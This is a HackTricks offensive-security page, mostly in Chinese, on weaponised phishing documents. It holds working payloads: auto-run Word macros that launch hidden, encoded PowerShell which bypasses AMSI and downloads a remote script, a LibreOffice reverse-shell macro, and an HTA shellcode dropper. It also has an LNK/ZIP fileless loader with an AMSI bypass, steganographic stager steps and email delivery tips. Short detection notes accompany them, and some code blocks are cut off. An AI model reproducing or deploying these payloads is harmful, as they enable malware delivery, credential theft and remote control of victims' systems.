HackTricks
钓鱼 文件与文档
Tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
Office 文档
Microsoft Word 在打开文件之前会执行文件数据验证。数据验证以数据结构识别的形式进行,依据 OfficeOpenXML 标准。如果在数据结构识别过程中发生任何错误,正在分析的文件将不会被打开。
通常,包含宏的 Word 文件使用 .docm 扩展名。然而,可以通过更改文件扩展名来重命名文件,同时仍然保留其宏执行能力。
例如,RTF 文件按设计不支持宏,但将 DOCM 文件重命名为 RTF 后,Microsoft Word 仍会处理该文件并能够执行宏。
相同的内部机制和行为适用于 Microsoft Office Suite 的所有软件(Excel、PowerPoint 等)。
你可以使用以下命令来检查哪些扩展名将被某些 Office 程序执行:
assoc | findstr /i "word excel powerp"
DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.
外部图片加载
转到:Insert –> Quick Parts –> Field
Categories: Links and References, Filed names: includePicture, and Filename or URL: http://
.png)
宏 后门
可以使用宏从文档运行任意代码。
自动加载函数
这些函数越常见,AV 检测它们的概率就越高。
- AutoOpen()
- Document_Open()
宏 代码示例
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
手动移除元数据
转到 File > Info > Inspect Document > Inspect Document,这会弹出 Document Inspector。点击 Inspect,然后在 Document Properties and Personal Information 旁点击 Remove All。
文档扩展名
完成后,从 Save as type 下拉菜单选择,将格式从 .docx 改为 Word 97-2003 .doc。
这样做是因为你 can’t save macro’s inside a .docx,而且启用宏的 .docm 扩展名存在一定的 污名(例如,缩略图图标会有一个大的 !,有些 web/email gateway 会完全阻止它们)。因此,这个 传统的 .doc 扩展名是最好的折衷。
恶意宏生成器
LibreOffice ODT auto-run macros (Basic)
LibreOffice Writer 文档可以嵌入 Basic 宏,并在打开文件时通过将宏绑定到 Open Document 事件(Tools → Customize → Events → Open Document → Macro…)来自动执行。一个简单的 reverse shell 宏如下:
Sub Shell
Shell("cmd /c powershell -enc BASE64_PAYLOAD"""")
End Sub
注意字符串内部的双引号 ("") —— LibreOffice Basic 使用它们来转义字面引号,因此以 ...==""") 结尾的 payloads 会保持内部命令和 Shell 参数的平衡。
Delivery tips:
- 将文件另存为
.odt,并将宏绑定到文档事件,这样在打开时会立即触发。 - 使用
swaks发送邮件时,使用--attach @resume.odt(需要@,以便发送的是文件字节,而不是文件名字符串)。当滥用接受任意RCPT TO收件人且不做验证的 SMTP 服务器时,这一点至关重要。
HTA Files
An HTA is a Windows program that combines HTML and scripting languages (such as VBScript and JScript). It generates the user interface and executes as a “fully trusted” application, without the constraints of a browser’s security model.
An HTA is executed using mshta.exe, which is typically installed along with Internet Explorer, making mshta dependant on IE. So if it has been uninstalled, HTAs will be unable to execute.
<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function
Pwn
</script>
</html>
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
var_func
self.close
</script>
强制 NTLM 身份验证
有几种方法可以 远程强制 NTLM 身份验证,例如,你可以在用户会访问的电子邮件或 HTML 中添加 不可见的图像(甚至是 HTTP MitM?)。或者向受害者发送会仅在打开文件夹时就触发 身份验证的文件地址。
在以下页面中查看这些想法和更多信息:
Force NTLM Privileged Authentication
NTLM Relay
不要忘记,你不仅可以窃取哈希或身份验证信息,还可以 perform NTLM relay attacks:
LNK Loaders + ZIP-Embedded Payloads (fileless chain)
高效的活动通常投递一个包含两个合法诱饵文档(PDF/DOCX)和一个恶意 .lnk 的 ZIP。关键在于真实的 PowerShell loader 存储在 ZIP 的原始字节中、位于一个唯一标记之后,而 .lnk 会从中提取并在内存中完整运行它。
由 .lnk PowerShell one-liner 实现的典型流程:
- 在常见路径中定位原始 ZIP:Desktop, Downloads, Documents, %TEMP%, %ProgramData% 以及当前工作目录的父目录。
- 读取 ZIP 字节并找到硬编码标记(例如 xFIQCV)。标记之后的所有内容都是嵌入的 PowerShell payload。
- 将 ZIP 复制到 %ProgramData%,在该处解压,并打开诱饵 .docx 以显得合法。
- 绕过当前进程的 AMSI: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
- 对下一阶段进行反混淆(例如,移除所有 # 字符),并在内存中执行它。
用于提取并运行嵌入阶段的示例 PowerShell 骨架:
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
)
$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
if(-not $zip){ return }
$bytes = [IO.File]::ReadAllBytes($zip.FullName)
$idx = [System.MemoryExtensions]::IndexOf($bytes, $marker)
if($idx -lt 0){ return }
$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
$code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
注意
- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
- The next stage frequently decrypts base64/XOR shellcode and executes it via Reflection.Emit + VirtualAlloc to minimize disk artifacts.
同一链中使用的持久化
- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:
威胁狩猎/IOCs
- ZIP files containing the ASCII marker string (e.g., xFIQCV) appended to the archive data.
- .lnk that enumerates parent/user folders to locate the ZIP and opens a decoy document.
- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Long-running business threads ending with links hosted under trusted PaaS domains.
Steganography-delimited payloads in images (PowerShell stager)
Recent loader chains deliver an obfuscated JavaScript/VBS that decodes and runs a Base64 PowerShell stager. That stager downloads an image (often GIF) that contains a Base64-encoded .NET DLL hidden as plain text between unique start/end markers. The script searches for these delimiters (examples seen in the wild: «<<sudo_png>> … <<sudo_odt>>>»), extracts the between-text, Base64-decodes it to bytes, loads the assembly in-memory and invokes a known entry method with the C2 URL.
工作流程
- Stage 1: Archived JS/VBS dropper → decodes embedded Base64 → launches PowerShell stager with -nop -w hidden -ep bypass.
- Stage 2: PowerShell stager → downloads image, carves marker-delimited Base64, loads the .NET DLL in-memory and calls its method (e.g., VAI) passing the C2 URL and options.
- Stage 3: Loader retrieves final payload and typically injects it via process hollowing into a trusted binary (commonly MSBuild.exe). See more about process hollowing and trusted utility proxy execution here:
PowerShell example to carve a DLL from an image and invoke a .NET method in-memory:
PowerShell stego payload 提取器和加载器
```powershell # Download the carrier image and extract a Base64 DLL between custom markers, then load and invoke it in-memory param( [string]$Url = 'https://example.com/payload.gif', [string]$StartM = '<注意
- 这是 ATT&CK T1027.003 (steganography/marker-hiding)。标记在不同活动中会有所不同。
- 通常在加载程序集之前会应用 AMSI/ETW bypass 和 string deobfuscation。
- 检测:扫描下载的图像以查找已知分隔符;识别访问这些图像并立即解码 Base64 blobs 的 PowerShell。
另见 stego 工具和 carving 技术:
Quick Triage Checklist First 10 Minutes
JS/VBS droppers → Base64 PowerShell staging
一个经常出现的初始阶段是作为归档内传送的、体积小且高度混淆的 .js 或 .vbs。其唯一目的是解码嵌入的 Base64 字符串,并使用 -nop -w hidden -ep bypass 启动 PowerShell,以通过 HTTPS 引导下一阶段。
骨架逻辑(抽象):
- 读取自身文件内容
- 在垃圾字符串之间定位 Base64 blob
- 解码为 ASCII PowerShell
- 通过
wscript.exe/cscript.exe调用powershell.exe执行
检测线索
- 归档的 JS/VBS 附件在命令行中以
-enc/FromBase64String参数生成powershell.exe。 - 从用户临时路径使用
wscript.exe启动powershell.exe -nop -w hidden。
可用于窃取 NTLM 哈希的 Windows 文件
查看关于 places to steal NTLM creds 的页面:
参考资料
- HTB Job – LibreOffice macro → IIS webshell → GodPotato
- Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies
- Hijack the TypeLib – New COM persistence technique (CICADA8)
- Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers
- MITRE ATT&CK – Steganography (T1027.003)
- MITRE ATT&CK – Process Hollowing (T1055.012)
- MITRE ATT&CK – Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001)
Tip
学习和实践 AWS 黑客技术:
学习和实践 GCP 黑客技术:支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。